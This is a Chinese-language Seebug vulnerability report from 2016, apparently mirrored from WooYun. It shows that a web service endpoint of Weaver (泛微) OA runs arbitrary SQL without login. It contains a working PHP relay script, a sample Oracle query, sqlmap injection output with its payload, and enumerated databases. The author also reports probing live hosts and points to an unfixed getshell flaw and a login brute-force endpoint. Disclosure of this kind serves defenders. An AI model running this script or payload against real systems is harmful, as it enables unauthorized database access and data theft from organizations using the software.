泛微OA某接口无需登录可执行任意SQL语句(附脚本)

2016-02-26T00:00:00
ID SSV:95584
Type seebug
Reporter Root
Modified 2016-02-26T00:00:00

Description

简要描述:

荒废了 啥都不会 找工作啊

详细说明:

先以本地为例 http://localhost:8088/ws

<img src="https://images.seebug.org/upload/201602/261505325ad6cc962e7df590d4fbbe74ea888bca.jpg" alt="Snap67.jpg" width="600" onerror="javascript:errimg(this);">

http://localhost:8088/ws/query?wsdl

<img src="https://images.seebug.org/upload/201602/26150714fab2776e42d8c9cec5a3b1ed92c57412.jpg" alt="Snap68.jpg" width="600" onerror="javascript:errimg(this);">

竟然提示

&lt;faultstring&gt;Unmarshalling Error: unexpected element (uri:"http://**.**.**.**/", local:"arg0"). Expected elements are &lt;{}arg1&gt;,&lt;{}arg0&gt; &lt;/faultstring&gt;

搜索

<img src="https://images.seebug.org/upload/201602/2615181165d4a7c015b4eff03b1f690f41abe9cd.jpg" alt="Snap69.jpg" width="600" onerror="javascript:errimg(this);">

提示是参数问题 改代码肯定是不行的 那就改参数吧

<img src="https://images.seebug.org/upload/201602/2615252536a8ba93666e7b4094d45c3dbfe72ad3.jpg" alt="Snap71.jpg" width="600" onerror="javascript:errimg(this);">

ORA-00900: 无效 sql 语句 看来是可以的 更改第一个参数

select SYS_CONTEXT('USERENV','CURRENT_USER') from dual

<img src="https://images.seebug.org/upload/201602/261529415c75b1acc655b35470069209324e24b2.jpg" alt="Snap72.jpg" width="600" onerror="javascript:errimg(this);">

查看用户量

<img src="https://images.seebug.org/upload/201602/2615305157d4a6dca1a586f6eafea56c58d2d285.jpg" alt="Snap73.jpg" width="600" onerror="javascript:errimg(this);">

任意SQL执行
继续中转

&lt;?php $arg0=$_GET['sql']; header("content-type:text/html;charset=utf-8"); try { $client = new SoapClient('http://localhost:8088/ws/query?wsdl'); $xml = " &lt;SOAP-ENV:Envelope xmlns:SOAP-ENV='http://**.**.**.**/soap/envelope/' xmlns:soap='http://**.**.**.**/wsdl/soap/' xmlns:xsd='http://**.**.**.**/1999/XMLSchema' xmlns:xsi='http://**.**.**.**/1999/XMLSchema-instance' xmlns:m0='http://**.**.**.**/' xmlns:SOAP-ENC='http://**.**.**.**/soap/encoding/' xmlns:urn='http://**.**.**.**/'&gt; &lt;SOAP-ENV:Header/&gt; &lt;SOAP-ENV:Body&gt; &lt;urn:queryBy&gt; &lt;arg0&gt;1&lt;/arg0&gt; &lt;arg1&gt;1&lt;/arg1&gt; &lt;/urn:queryBy&gt; &lt;/SOAP-ENV:Body&gt; &lt;/SOAP-ENV:Envelope&gt; "; $result=$client-&gt;queryBy(array('arg0'=&gt;$arg0,'arg1'=&gt;'1')); echo $result-&gt;return ;//显示结果 } catch (SOAPFault $e) { print_r('Exception:'.$e); } ?&gt;

<img src="https://images.seebug.org/upload/201602/261534275441950c0a20a1918da42f8844917d71.jpg" alt="Snap74.jpg" width="600" onerror="javascript:errimg(this);">

SQL注入

``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts:


Place: GET Parameter: sql Type: inline query Title: Oracle inline queries Payload: sql=(SELECT CHR(113)||CHR(115)||CHR(112)||CHR(99)||CHR(113)||(SELEC T (CASE WHEN (8499=8499) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(101)||CHR( 112)||CHR(97)||CHR(113) FROM DUAL)


[15:39:49] [INFO] the back-end DBMS is Oracle web server operating system: Windows web application technology: Apache 2.2.22, PHP 5.3.10 back-end DBMS: Oracle ```

available databases [20]: [*] APEX_030200 [*] APPQOSSYS [*] CTXSYS [*] DBSNMP [*] EWEAVER [*] EXFSYS [*] FLOWS_FILES [*] MDSYS [*] OLAPSYS [*] ORDDATA [*] ORDSYS [*] OUTLN [*] OWBSYS [*] PM [*] SCOTT [*] SYS [*] SYSMAN [*] SYSTEM [*] WMSYS [*] XDB

漏洞证明:

官方:http://...:9085/ws/query?wsdl

<img src="https://images.seebug.org/upload/201602/26154455f207d294a3695c5236169bf1c877a2e4.jpg" alt="Snap76.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201602/26154348dede073da2890dd3a00daaac84703c42.jpg" alt="Snap75.jpg" width="600" onerror="javascript:errimg(this);">

SQL注入就不进行了 毕竟可以执行SQL语句 http://.../ws/query?wsdl

<img src="https://images.seebug.org/upload/201602/261546178688d91ef58dd71df3c5721177b8aedd.jpg" alt="Snap77.jpg" width="600" onerror="javascript:errimg(this);">

http://.../ws/query?wsdl

<img src="https://images.seebug.org/upload/201602/26154725889e6a12f2e4b1f10771760b8370fd9b.jpg" alt="Snap78.jpg" width="600" onerror="javascript:errimg(this);">

http://.../bugs/wooyun-2015-0148980 这个估计还没修复 可以getshell http://localhost:8088/ws/ew?wsdl 可以用于爆破登录

<img src="https://images.seebug.org/upload/201602/26155453866ba54bb3412b1066aca37e77b26c77.jpg" alt="Snap79.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201602/261553055dab5e3a61df785ebcd27501f1feeb19.jpg" alt="Snap80.jpg" width="600" onerror="javascript:errimg(this);">

其他问题估计还有 自测吧